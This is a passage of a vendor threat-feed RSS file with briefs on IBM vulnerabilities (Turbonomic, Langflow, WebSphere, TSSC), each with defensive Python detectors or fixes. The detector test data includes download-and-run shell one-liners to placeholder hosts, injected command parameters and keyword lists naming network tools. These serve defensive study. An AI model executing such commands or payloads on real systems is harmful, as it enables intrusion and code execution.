<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>IBM — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/vendors/ibm/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 30 Apr 2026 22:16:26 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/vendors/ibm/feed.xml" rel="self" type="application/rss+xml"/><item><title>IBM Turbonomic prometurbo Agent Privilege Escalation via Excessive Permissions (CVE-2026-6389)</title><link>https://feed.craftedsignal.io/briefs/2026-04-turbonomic-privesc/</link><pubDate>Thu, 30 Apr 2026 22:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-turbonomic-privesc/</guid><description>IBM Turbonomic prometurbo agent versions 8.16.0 through 8.17.6 grant excessive cluster-wide permissions, including unrestricted read access to all secrets, allowing a compromised operator or service account to exfiltrate credentials, escalate privileges, and achieve full cluster compromise.</description><content:encoded><![CDATA[<p>CVE-2026-6389 affects IBM Turbonomic prometurbo agent versions 8.16.0 through 8.17.6. The vulnerability stems from the cluster-wide permissions the agent is granted within IBM Turbonomic Application Resource Management, which are broader than its function requires. A successful exploit allows an attacker who has compromised the operator or its associated service account to gain unrestricted read access to all secrets within the cluster.
This vulnerability was reported on April 30, 2026. Because Kubernetes secrets routinely hold database passwords, API keys and similar credentials, cluster-wide read access to them is a direct path from one compromised service account to complete cluster compromise. Defenders should prioritize patching and monitoring for unauthorized access to sensitive resources.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to the Kubernetes cluster, potentially through exploiting a vulnerability in a separate application or service running within the cluster, or via compromised credentials.</li>
<li>The attacker identifies the IBM Turbonomic prometurbo agent and its associated service account within the compromised cluster.</li>
<li>The attacker leverages the compromised service account or operator to interact with the Kubernetes API, exploiting the excessive cluster-wide permissions granted to the prometurbo agent.</li>
<li>The attacker utilizes the unrestricted read access to enumerate and exfiltrate sensitive credentials stored as secrets within the cluster, including database passwords, API keys, and other sensitive information.</li>
<li>Using the stolen credentials, the attacker escalates privileges by accessing other services and resources within the cluster, such as deploying malicious pods or modifying existing deployments.</li>
<li>The attacker achieves persistence by creating or modifying service accounts, roles, and role bindings to maintain access to the cluster even if the initial point of compromise is remediated.</li>
<li>The attacker moves laterally within the cluster, compromising additional nodes and workloads to expand their control and access to sensitive data.</li>
<li>The attacker achieves full cluster compromise, gaining complete control over all resources and data within the Kubernetes environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful exploitation of CVE-2026-6389 can lead to a full compromise of the Kubernetes cluster. This includes unrestricted access to sensitive data and the ability to control all workloads and resources within the environment. The impact includes potential data breaches, service disruptions, and significant financial and reputational damage. Organizations in any sector using the affected versions of IBM Turbonomic are at risk, and the severity is heightened in environments handling sensitive data or critical infrastructure.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade IBM Turbonomic prometurbo agent to a version beyond 8.17.6 to patch CVE-2026-6389.</li>
<li>Review and restrict the permissions granted to the prometurbo agent service account, adhering to the principle of least privilege: a metrics-collection agent has no need to read secrets, so any ClusterRole or ClusterRoleBinding that grants it <code>get</code>, <code>list</code> or <code>watch</code> on secrets (directly or through a <code>*</code> wildcard) should be narrowed or removed.</li>
<li>Enable Kubernetes API server audit logging and alert on secret reads by the agent&rsquo;s service account, including denied ones, which indicate probing (reference: Kubernetes documentation).</li>
<li>Deploy the Sigma rule &ldquo;Detect Kubernetes Secret Access via Turbonomic Agent&rdquo; to identify potential exploitation attempts (reference: Sigma rule below).</li>
<li>Monitor network-connection logs for unusual activity originating from the prometurbo agent service account, such as attempts to access or exfiltrate large amounts of data.</li>
<li>Implement network segmentation to limit the potential impact of a compromised cluster, preventing lateral movement to other environments.</li>
</ul>
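<p>As an added example (not IBM&rsquo;s or Turbonomic&rsquo;s code), the following Python checks both halves of the recommendation above: whether a set of RBAC rules grants read access to secrets, including through <code>*</code> wildcards, and which audit-log events show a given service account actually reading secrets. The ClusterRole rules, the audit events and the service-account name <code>system:serviceaccount:turbo:prometurbo</code> are constructed for the example and are not taken from the advisory.</p>

```python
import json

READ_VERBS = {"get", "list", "watch"}

# Constructed ClusterRole rules in the shape of a manifest's `rules:` list.
# Illustrative only; not the real Turbonomic/prometurbo RBAC.
BROAD_RULES = [
    {"apiGroups": [""], "resources": ["*"], "verbs": ["get", "list", "watch"]},
    {"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["get", "list"]},
]

# What a metrics-collection agent plausibly needs: workload objects, never secrets.
LEAST_PRIVILEGE_RULES = [
    {"apiGroups": [""], "resources": ["pods", "nodes", "namespaces", "services"],
     "verbs": ["get", "list", "watch"]},
    {"apiGroups": ["apps"], "resources": ["deployments", "statefulsets"],
     "verbs": ["get", "list", "watch"]},
]


def rule_grants(rule, api_group, resource, verb):
    """True if one RBAC rule covers (api_group, resource, verb), honouring '*' wildcards."""
    groups = rule.get("apiGroups", [])
    resources = rule.get("resources", [])
    verbs = rule.get("verbs", [])
    return (("*" in groups or api_group in groups)
            and ("*" in resources or resource in resources)
            and ("*" in verbs or verb in verbs))


def secret_read_verbs(rules):
    """Read verbs the rules grant on core-group secrets; an empty set means least privilege holds."""
    return {v for v in READ_VERBS if any(rule_grants(r, "", "secrets", v) for r in rules)}


# Constructed audit-log lines in the audit.k8s.io/v1 Event shape (Metadata level).
# The principal name is an assumed service account, not a documented one.
AGENT_SA = "system:serviceaccount:turbo:prometurbo"
AUDIT_LINES = [
    json.dumps({"stage": "ResponseComplete", "verb": "list", "user": {"username": AGENT_SA},
                "objectRef": {"resource": "pods"}, "responseStatus": {"code": 200}}),
    json.dumps({"stage": "ResponseComplete", "verb": "list", "user": {"username": AGENT_SA},
                "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}}),
    json.dumps({"stage": "ResponseStarted", "verb": "get", "user": {"username": AGENT_SA},
                "objectRef": {"resource": "secrets", "namespace": "payments", "name": "db-creds"},
                "responseStatus": {"code": 200}}),
    json.dumps({"stage": "ResponseComplete", "verb": "get", "user": {"username": AGENT_SA},
                "objectRef": {"resource": "secrets", "namespace": "payments", "name": "db-creds"},
                "responseStatus": {"code": 200}}),
    json.dumps({"stage": "ResponseComplete", "verb": "get", "user": {"username": AGENT_SA},
                "objectRef": {"resource": "secrets", "namespace": "payments", "name": "tls"},
                "responseStatus": {"code": 403}}),
    json.dumps({"stage": "ResponseComplete", "verb": "get",
                "user": {"username": "system:kube-controller-manager"},
                "objectRef": {"resource": "secrets", "namespace": "kube-system", "name": "sa-token"},
                "responseStatus": {"code": 200}}),
]


def secret_reads_by(lines, principal):
    """(verb, namespace, name, status code) for secret reads attempted by one principal.

    Only the ResponseComplete stage is counted so one request is not reported
    twice (the API server also emits RequestReceived/ResponseStarted for it).
    Denied (403) reads are kept: a principal probing for secrets it cannot
    read is the early warning before someone widens its binding.
    """
    hits = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("stage") != "ResponseComplete":
            continue
        if ev.get("user", {}).get("username") != principal:
            continue
        ref = ev.get("objectRef", {})
        if ref.get("resource") != "secrets" or ev.get("verb") not in READ_VERBS:
            continue
        code = ev.get("responseStatus", {}).get("code", 0)
        hits.append((ev["verb"], ref.get("namespace", "<all>"), ref.get("name", "*"), code))
    return hits


if __name__ == "__main__":
    print("broad role grants on secrets:", sorted(secret_read_verbs(BROAD_RULES)))
    print("tight role grants on secrets:", sorted(secret_read_verbs(LEAST_PRIVILEGE_RULES)))
    for hit in secret_reads_by(AUDIT_LINES, AGENT_SA):
        print("secret read by agent:", hit)
```

<p>On a live cluster the same question can be put to the API server directly with <code>kubectl auth can-i list secrets --all-namespaces --as=system:serviceaccount:&lt;namespace&gt;:&lt;service-account&gt;</code>; a &ldquo;yes&rdquo; for an agent that only collects metrics is the over-privilege the advisory describes. Note that a cluster-wide <code>list</code> in the audit log carries no namespace or name, which is why the example reports it as <code>&lt;all&gt;</code>/<code>*</code>: that single request is the one that dumps every secret in the cluster.</p>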
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>privilege-escalation</category><category>credential-access</category><category>kubernetes</category><category>vulnerability</category></item><item><title>IBM Langflow Desktop Vulnerable to Remote Command Execution (CVE-2026-6543)</title><link>https://feed.craftedsignal.io/briefs/2026-04-ibm-langflow-rce/</link><pubDate>Thu, 30 Apr 2026 22:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ibm-langflow-rce/</guid><description>IBM Langflow Desktop versions 1.0.0 through 1.8.4 are vulnerable to remote command execution, allowing an attacker to execute arbitrary commands with the privileges of the Langflow process, potentially leading to sensitive data exposure and lateral movement.</description><content:encoded><![CDATA[<p>IBM Langflow Desktop, a tool for building and experimenting with language-model applications, contains a remote command execution vulnerability (CVE-2026-6543) in versions 1.0.0 through 1.8.4. An attacker with the ability to influence Langflow&rsquo;s execution can inject and execute arbitrary commands with the same privileges as the Langflow process. This flaw can be exploited to read sensitive environment variables containing API keys and database credentials, modify critical files, and propagate further attacks within the internal network. The vulnerability poses a significant risk to organizations running affected versions of Langflow Desktop, potentially leading to data breaches and system compromise. Defenders should prioritize patching or implementing mitigations to prevent exploitation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a system with Langflow Desktop installed (versions 1.0.0 - 1.8.4). This could be achieved through social engineering or by compromising a user account with access to the system.</li>
<li>The attacker crafts a malicious input or payload designed to exploit the command execution vulnerability within Langflow.</li>
<li>The attacker triggers Langflow to process the malicious payload, leveraging the vulnerability to inject and execute arbitrary commands.</li>
<li>The injected command executes with the privileges of the Langflow process, allowing the attacker to interact with the underlying operating system.</li>
<li>The attacker leverages command execution to read sensitive environment variables, potentially obtaining API keys, database credentials, or other sensitive information.</li>
<li>The attacker uses the acquired credentials to access sensitive data or systems within the internal network, escalating their privileges and expanding their reach.</li>
<li>The attacker modifies critical files or installs malicious software, establishing persistence and compromising the integrity of the system.</li>
<li>The attacker launches further attacks on the internal network, leveraging the compromised system as a pivot point to compromise additional systems and data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-6543 allows attackers to execute arbitrary commands on systems running vulnerable versions of IBM Langflow Desktop. This can lead to the exposure of sensitive environment variables containing API keys and database credentials, the modification of critical files, and the launching of further attacks on the internal network. The impact can range from data breaches and system compromise to complete control over affected systems and networks. Given the nature of Langflow, targeted sectors likely include organizations involved in AI/ML development and related fields.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade IBM Langflow Desktop to a patched version beyond 1.8.4 to remediate CVE-2026-6543, as recommended by IBM.</li>
<li>Deploy the Sigma rule &ldquo;Detect Langflow Process Spawning Suspicious Processes&rdquo; to identify potential exploitation attempts based on unusual child processes spawned by Langflow.</li>
<li>Monitor network connections from Langflow Desktop instances for suspicious outbound traffic, indicating potential data exfiltration or command-and-control activity.</li>
<li>Implement least privilege principles to limit the impact of successful exploitation by restricting the permissions of the Langflow process.</li>
</ul>
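<p>The child-process detection the Sigma rule above describes, written out in Python as an added example (not IBM&rsquo;s or Langflow&rsquo;s code, and not the rule itself): a process-creation event is flagged when its parent is Langflow and the child is a shell, interpreter or download tool. The image names <code>langflow.exe</code> and <code>langflow</code>, the install paths and the events are assumptions made for the example.</p>

```python
import ntpath

# Shells, interpreters and download tools in which an injected command usually lands.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh",
                       "curl", "wget", "certutil.exe", "bitsadmin.exe"}

# Assumed image names for Langflow Desktop; confirm the real binary name on your hosts.
LANGFLOW_IMAGES = {"langflow.exe", "langflow"}


def image_name(path):
    """Lower-cased file name; ntpath.basename accepts both backslash and slash separators."""
    return ntpath.basename(path).lower()


def langflow_suspicious_children(events):
    """(child image name, command line) for suspicious children of a Langflow process."""
    hits = []
    for ev in events:
        if image_name(ev.get("ParentImage", "")) not in LANGFLOW_IMAGES:
            continue
        child = image_name(ev.get("Image", ""))
        if child in SUSPICIOUS_CHILDREN:
            hits.append((child, ev.get("CommandLine", "")))
    return hits


# Constructed Sysmon Event ID 1 style records (Image / ParentImage / CommandLine).
# Install paths are assumed and 203.0.113.0/24 is a documentation address range.
EVENTS = [
    # Langflow spawning cmd.exe that writes a recon result: flagged.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Langflow\langflow.exe",
     "CommandLine": r"cmd.exe /c whoami > C:\Users\Public\out.txt"},
    # Console host attached to a Windows console app: not in the suspicious set.
    {"Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Langflow\langflow.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    # macOS path form, download-and-run one-liner under sh: flagged.
    {"Image": "/bin/sh",
     "ParentImage": "/Applications/Langflow.app/Contents/MacOS/langflow",
     "CommandLine": "sh -c 'curl http://203.0.113.5/s | sh'"},
    # Same child image but the parent is Explorer, not Langflow: ignored.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for child, cmdline in langflow_suspicious_children(EVENTS):
        print(f"langflow -> {child}: {cmdline}")
```

<p>Tune the child list to what Langflow legitimately spawns in your environment before alerting; a custom component that shells out looks identical to an injected command at this level, so the command line in the hit is what the analyst triages.</p>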
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>cve-2026-6543</category><category>command execution</category><category>code injection</category><category>ibm langflow</category></item><item><title>IBM Langflow Desktop Unauthenticated Image Access via IDOR</title><link>https://feed.craftedsignal.io/briefs/2026-04-langflow-idor/</link><pubDate>Thu, 30 Apr 2026 21:16:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-langflow-idor/</guid><description>IBM Langflow Desktop versions 1.0.0 through 1.8.4 are affected by an insecure direct object reference (IDOR) vulnerability (CVE-2026-4503), allowing unauthenticated users to view other users' images due to a user-controlled key.</description><content:encoded><![CDATA[<p>IBM Langflow Desktop versions 1.0.0 through 1.8.4 are affected by an insecure direct object reference (IDOR) vulnerability, designated as CVE-2026-4503. This flaw enables unauthenticated attackers to access and view images belonging to other users. The vulnerability arises from the application&rsquo;s reliance on a user-controlled key to select the image returned, without checking that the requester owns the image or is even authenticated, so an attacker can substitute another user&rsquo;s key and retrieve their image data. This poses a risk to user privacy and data security, as attackers can potentially view confidential or personal images without proper authentication.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a user-controlled key used to reference image objects within Langflow Desktop.</li>
<li>The attacker modifies this key to point to another user&rsquo;s image object.</li>
<li>The attacker sends a request to the Langflow Desktop application using the modified key.</li>
<li>The application, due to the IDOR vulnerability, fails to properly validate the attacker&rsquo;s authorization to access the requested image object.</li>
<li>The application retrieves and returns the image data associated with the targeted user&rsquo;s image.</li>
<li>The attacker views the image without authentication.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an unauthenticated attacker to view other users&rsquo; images within IBM Langflow Desktop. This can lead to a breach of privacy, as sensitive or personal images may be exposed. The number of affected users depends on the number of installations of Langflow Desktop within the vulnerable version range (1.0.0 through 1.8.4).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security patch or upgrade to a version of IBM Langflow Desktop that addresses CVE-2026-4503 as detailed in the IBM advisory.</li>
<li>Implement stricter authorization checks on image object references to prevent unauthorized access, mitigating CVE-2026-4503.</li>
</ul>
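<p>To make the authorization fix in the recommendation concrete, here is an added Python example (not Langflow&rsquo;s code) of the vulnerable pattern next to two hardened forms: the first checks that the authenticated caller owns the object before returning it, the second replaces the guessable key with a per-user random handle so there is nothing for an attacker to increment. The image store and user names are constructed for the example.</p>

```python
import secrets

# Constructed store: internal image id -> owner and bytes. Not Langflow's data model.
IMAGES = {
    "1": {"owner": "alice", "data": b"\x89PNG alice-avatar"},
    "2": {"owner": "bob", "data": b"\x89PNG bob-diagram"},
}


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


def get_image_vulnerable(image_id, current_user=None):
    """The IDOR pattern: the caller-supplied key alone selects the object.

    No authentication is required and no ownership check is made, so any
    client can walk the key space ("1", "2", ...) and read every image.
    """
    return IMAGES[image_id]["data"]


def get_image_hardened(image_id, current_user):
    """Authenticate first, then authorise against the object's owner."""
    if current_user is None:
        raise Unauthenticated("login required")
    record = IMAGES.get(image_id)
    # One answer for "does not exist" and "not yours": a 403 that differs
    # from a 404 would let an attacker confirm which keys are in use.
    if record is None or record["owner"] != current_user:
        raise Forbidden("no such image for this user")
    return record["data"]


# Indirect reference map: clients see per-user random handles, never the
# internal id, so a key cannot be guessed or incremented.
_REFERENCES = {}   # (user, handle) -> internal image id


def issue_reference(current_user, image_id):
    """Mint an opaque handle bound to this user for an image they own."""
    if IMAGES.get(image_id, {}).get("owner") != current_user:
        raise Forbidden("cannot reference an image you do not own")
    handle = secrets.token_urlsafe(16)
    _REFERENCES[(current_user, handle)] = image_id
    return handle


def get_image_by_reference(current_user, handle):
    """Resolve a handle in the scope of the calling user only."""
    if current_user is None:
        raise Unauthenticated("login required")
    image_id = _REFERENCES.get((current_user, handle))
    if image_id is None:
        raise Forbidden("no such image for this user")
    return IMAGES[image_id]["data"]


def raises(exc_type, fn, *args):
    """True if fn(*args) raises exc_type; used to exercise the failure paths."""
    try:
        fn(*args)
    except exc_type:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, no user:", get_image_vulnerable("2"))
    print("hardened, alice asks for bob's image:", raises(Forbidden, get_image_hardened, "2", "alice"))
    handle = issue_reference("alice", "1")
    print("alice via handle:", get_image_by_reference("alice", handle))
    print("bob with alice's handle:", raises(Forbidden, get_image_by_reference, "bob", handle))
```

<p>The ownership check is the essential fix for this class of bug; the indirect handle is defence in depth that also stops an attacker from learning which keys exist. Whichever form is used, the check must run on every object-returning endpoint, not only the one that was reported.</p>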
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>idor</category><category>vulnerability</category><category>privilege-escalation</category></item><item><title>IBM WebSphere Liberty Identity Spoofing Vulnerability (CVE-2026-3621)</title><link>https://feed.craftedsignal.io/briefs/2026-04-websphere-spoofing/</link><pubDate>Thu, 23 Apr 2026 00:18:31 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-websphere-spoofing/</guid><description>IBM WebSphere Application Server Liberty versions 17.0.0.3 through 26.0.0.4 are susceptible to identity spoofing when applications are deployed without proper authentication and authorization configurations, potentially leading to unauthorized access and privilege escalation.</description><content:encoded><![CDATA[<p>CVE-2026-3621 identifies an identity spoofing vulnerability affecting IBM WebSphere Application Server Liberty versions 17.0.0.3 through 26.0.0.4. This vulnerability arises when applications are deployed on WebSphere Liberty without authentication or authorization mechanisms configured. An attacker could potentially exploit this flaw to impersonate legitimate users or services, gaining unauthorized access to resources and performing actions on their behalf. This vulnerability was reported to IBM and assigned a CVSS v3.1 base score of 7.5, indicating a high potential impact. Successful exploitation allows for unauthorized actions and data access within the vulnerable WebSphere Liberty environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a WebSphere Liberty instance running a vulnerable version (17.0.0.3 - 26.0.0.4).</li>
<li>The attacker determines that an application is deployed on the WebSphere Liberty instance without proper authentication or authorization configurations.</li>
<li>The attacker crafts a malicious request, spoofing the identity of a legitimate user. This might involve manipulating HTTP headers or other request parameters.</li>
<li>The malicious request is sent to the vulnerable application on the WebSphere Liberty server.</li>
<li>The WebSphere Liberty server, lacking proper authentication checks, processes the request under the forged identity.</li>
<li>The attacker gains unauthorized access to resources or performs actions associated with the spoofed identity.</li>
<li>The attacker can potentially escalate privileges by accessing administrative functions or sensitive data accessible to the spoofed user.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-3621 can lead to significant consequences. An attacker could gain unauthorized access to sensitive data, modify application configurations, or perform actions on behalf of legitimate users, potentially leading to data breaches, service disruption, or complete system compromise. The vulnerability is particularly concerning for organizations that rely on WebSphere Liberty for critical applications and have not implemented proper authentication and authorization controls. The number of affected organizations is currently unknown but will depend on the prevalence of vulnerable WebSphere Liberty instances deployed without adequate security measures.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply appropriate authentication and authorization configurations to all applications deployed on IBM WebSphere Application Server Liberty to mitigate CVE-2026-3621, as described in <a href="https://www.ibm.com/support/pages/node/7270437">IBM&rsquo;s advisory</a>.</li>
<li>Deploy the Sigma rule &ldquo;Detect WebSphere Liberty Unauthorized Access Attempt&rdquo; to identify suspicious requests lacking authentication headers.</li>
<li>Upgrade to a non-vulnerable version of IBM WebSphere Application Server Liberty outside the range of 17.0.0.3 through 26.0.0.4.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cve-2026-3621</category><category>websphere</category><category>identity spoofing</category><category>cwe-269</category></item><item><title>IBM Total Storage Service Console (TSSC) / TS4500 IMC Unauthenticated Remote Command Execution</title><link>https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/</link><pubDate>Thu, 23 Apr 2026 00:16:46 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/</guid><description>An unauthenticated user can execute arbitrary commands with normal user privileges on vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC versions due to improper validation of user-supplied input, as identified by CVE-2026-5935.</description><content:encoded><![CDATA[<p>CVE-2026-5935 describes a critical vulnerability affecting IBM Total Storage Service Console (TSSC) / TS4500 IMC software. Specifically, versions 9.2, 9.3, 9.4, 9.5, and 9.6 are susceptible to unauthenticated remote command execution. The vulnerability stems from insufficient validation of user-supplied input, allowing an attacker to inject and execute arbitrary commands on the system. Successful exploitation grants the attacker normal user privileges. This vulnerability poses a significant risk as it allows attackers to compromise the system without authentication, potentially leading to data breaches, system disruption, or further lateral movement within the network. Defenders should prioritize patching or mitigating this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC instance running versions 9.2, 9.3, 9.4, 9.5, or 9.6.</li>
<li>The attacker crafts a malicious request containing an OS command injection payload. This payload is designed to exploit the improper input validation within the TSSC/IMC software.</li>
<li>The attacker sends the crafted request to the vulnerable TSSC/IMC instance, targeting a specific endpoint or function susceptible to command injection.</li>
<li>The TSSC/IMC software processes the request without proper validation, passing the malicious payload to the underlying operating system.</li>
<li>The operating system executes the injected command with the privileges of a normal user account.</li>
<li>The attacker gains the ability to execute arbitrary commands on the system, potentially allowing them to read sensitive files, modify configurations, or install malicious software.</li>
<li>The attacker may leverage their initial access to escalate privileges, move laterally within the network, or establish persistent access to the compromised system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5935 allows an unauthenticated attacker to execute arbitrary commands on the affected IBM Total Storage Service Console (TSSC) / TS4500 IMC system. This can lead to complete system compromise, data breaches, and disruption of services. The impact could range from unauthorized access to sensitive data to the deployment of ransomware, depending on the attacker&rsquo;s objectives and the level of access achieved after exploitation. Because no authentication is required, the vulnerability is rated critical even though the initial foothold is a normal user account rather than root.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to a fixed version of IBM Total Storage Service Console (TSSC) / TS4500 IMC as outlined in the IBM advisory (<a href="https://www.ibm.com/support/pages/node/7270127">https://www.ibm.com/support/pages/node/7270127</a>).</li>
<li>Deploy the Sigma rule to detect command execution via web requests targeting TSSC/IMC.</li>
<li>Implement network segmentation to limit the blast radius of a potential compromise of the TSSC/IMC system.</li>
</ul>
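<p>As an added example of the web-request detection the recommendation calls for (not IBM&rsquo;s code and not a published Sigma rule), the following Python scans access-log lines for query parameters carrying shell metacharacters or download tools. It percent-decodes values repeatedly before matching, because a URL-encoded or double-encoded <code>;</code> or <code>$(</code> passes a raw string match. The log lines, the <code>/console/...</code> paths and the addresses are constructed; they are not real TSSC/IMC endpoints.</p>

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed combined-format access-log lines. Paths are hypothetical and
# 198.51.100.0/24 and 203.0.113.0/24 are documentation address ranges.
ACCESS_LOG = [
    '198.51.100.7 - - [23/Apr/2026:00:10:01 +0000] "GET /console/status?host=tape01&format=json HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Apr/2026:00:10:05 +0000] "GET /console/ping?host=tape01%3Bid HTTP/1.1" 200 90',
    '203.0.113.9 - - [23/Apr/2026:00:10:09 +0000] "GET /console/ping?host=tape01%2524(id) HTTP/1.1" 200 90',
    '198.51.100.7 - - [23/Apr/2026:00:10:12 +0000] "GET /console/search?q=backup+jobs&page=2 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [23/Apr/2026:00:10:20 +0000] "GET /console/ping?host=tape01%7Cwget+http://203.0.113.9/x HTTP/1.1" 500 0',
    '198.51.100.7 - - [23/Apr/2026:00:10:30 +0000] "POST /console/login HTTP/1.1" 302 0',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Shell metacharacters that turn one argument into several commands, plus the
# tools an injected command usually calls to fetch or run a second stage.
METACHARS = re.compile(r'[;|`\n]|&&|\$\(')
TOOLS = re.compile(r'(?<![\w-])(sh|bash|nc|ncat|curl|wget|python|perl)(?![\w-])')


def decode_fully(value, rounds=3):
    """Percent-decode until stable (bounded) so %2524 -> %24 -> $ is caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """(name, decoded value) for query parameters that look like injected commands.

    Parameters are split on '&' before decoding, so a literal '&' separator is
    never mistaken for a '&&' command chain inside a value.
    """
    query = urlsplit(target).query
    findings = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if METACHARS.search(value) or TOOLS.search(value):
            findings.append((name, value))
    return findings


def scan_access_log(lines):
    """(client ip, request target, findings) for each request with a suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = suspicious_params(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts


if __name__ == "__main__":
    for ip, target, findings in scan_access_log(ACCESS_LOG):
        print(ip, target, findings)
```

<p>Access logs carry only the request line, so payloads sent in a POST body need a reverse proxy or WAF that logs bodies; the same <code>suspicious_params</code> check applies to form-encoded body fields once those are available. A 500 on a request like the fourth hit is worth a second look on its own: a command that ran but broke the page is still a command that ran.</p>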
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-5935</category><category>rce</category><category>command injection</category></item><item><title>Process Execution from Suspicious Windows Directories</title><link>https://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/</link><pubDate>Thu, 04 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/</guid><description>Adversaries may execute processes from unusual default Windows directories to masquerade malware and evade defenses by blending in with trusted paths, making malicious activity harder to detect.</description><content:encoded><![CDATA[<p>This detection identifies process execution from suspicious default Windows directories. Attackers may hide malware in trusted paths to evade defenses, making it difficult for analysts to distinguish between legitimate and malicious activity. The detection focuses on identifying processes running from directories like C:\PerfLogs, C:\Users\Public, and various Windows subdirectories (e.g., C:\Windows\Tasks, C:\Windows\AppReadiness), where executable files are not typically expected to reside. The detection excludes known legitimate processes like SpeechUXWiz.exe, SystemSettings.exe, TrustedInstaller.exe and other Intel and IBM executables to reduce false positives. This technique is often used to bypass security controls or take advantage of existing exceptions applied to these directories. This activity was observed being used by threat actors in the Siestagraph campaign.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).</li>
<li>The attacker drops a malicious executable into a suspicious directory like C:\Users\Public or C:\Windows\Tasks.</li>
<li>The attacker executes the malware from the unusual directory. This might be achieved using <code>cmd.exe</code> or <code>powershell.exe</code>.</li>
<li>The executed malware establishes persistence by creating a scheduled task or modifying registry keys.</li>
<li>The malware connects to a command-and-control (C2) server to receive further instructions.</li>
<li>The C2 server instructs the malware to perform reconnaissance on the network.</li>
<li>The malware attempts to move laterally to other systems on the network using techniques like pass-the-hash or exploiting vulnerabilities.</li>
<li>The attacker achieves their objective, such as data exfiltration, ransomware deployment, or establishing long-term access to the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to the execution of arbitrary code, persistence on the system, and further compromise of the network. Attackers can use this technique to bypass security controls and evade detection, potentially leading to data breaches, financial loss, or disruption of services. While the rule itself has a medium severity, the impact of a successful attack using this technique can be severe, depending on the attacker&rsquo;s objectives and the compromised data.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Process Execution from Unusual Directory&rdquo; to your SIEM and tune for your environment to detect suspicious process execution.</li>
